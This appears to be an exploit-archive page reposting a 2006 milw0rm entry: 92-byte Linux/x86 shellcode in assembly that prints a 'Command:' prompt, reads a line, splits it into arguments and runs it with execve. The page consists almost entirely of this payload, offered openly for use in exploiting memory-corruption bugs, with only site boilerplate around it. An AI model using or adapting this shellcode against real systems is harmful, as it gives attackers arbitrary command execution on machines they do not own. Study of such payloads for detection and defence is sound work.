[] NeoSense
E X P L O I T S
title author type platform port cve id

Linux/x86 - execve() + Read Shellcode (92 bytes)

Author: 0ut0fbound
type: 
platform: linux_x86
port: 92.0
date_added: 2006-11-19 
date_updated: 2018-01-09 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
#    XCHG Research Group
#    Linux/x86 execve read shellcode - 92 bytes
#
#
#    )--[ Writed by 0ut0fbound ]--(
#
#    - http://outofbound.host.sk
#    - http://xchglabs.host.sk

.text

	.globl _start

_start:

# EAX = 0x04 -> syscall write()
	xorl %eax, %eax
	movb $0x4, %al
	xorl %ebx, %ebx
	inc %ebx
	pushl $0x20202020
	pushl $0x3a646e61
	pushl $0x6d6d6f43
	movl %esp, %ecx
	xorl %edx, %edx
	movb $0x9, %dl
	int $0x80

# EAX = 0x03 -> syscall read()
	xorl %eax, %eax
	movb $0x3, %al
	xorl %ebx, %ebx
	xorl %edx, %edx
	movb $0x20, %dl
	subl %edx, %esp
	movl %esp, %ecx
	int $0x80

# buffer[read(0, buffer, sizeof(buffer))] = 0;
	addl %eax, %ecx
	dec %ecx
	movl %ebx, (%ecx)

	movl %esp, %ebx
	addl %eax, %ebx
	movl %eax, %ecx

	xorl %edx, %edx
	push %edx

LOOP1:
	movb (%ebx), %al
	cmp $0x20, %al
	jne CONT
	xorb $0x20, (%ebx)
	inc %ebx
	pushl %ebx
	dec %ebx
CONT:
	dec %ebx
loop LOOP1

	push %ebx

	movl %esp, %ecx
	xorl %eax, %eax
	movb $0xb, %al

	int $0x80

# EAX = 0x01 -> syscall exit
	xorl %eax, %eax
	inc %al
	xorl %ebx, %ebx
	int $0x80

# milw0rm.com [2006-11-20]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.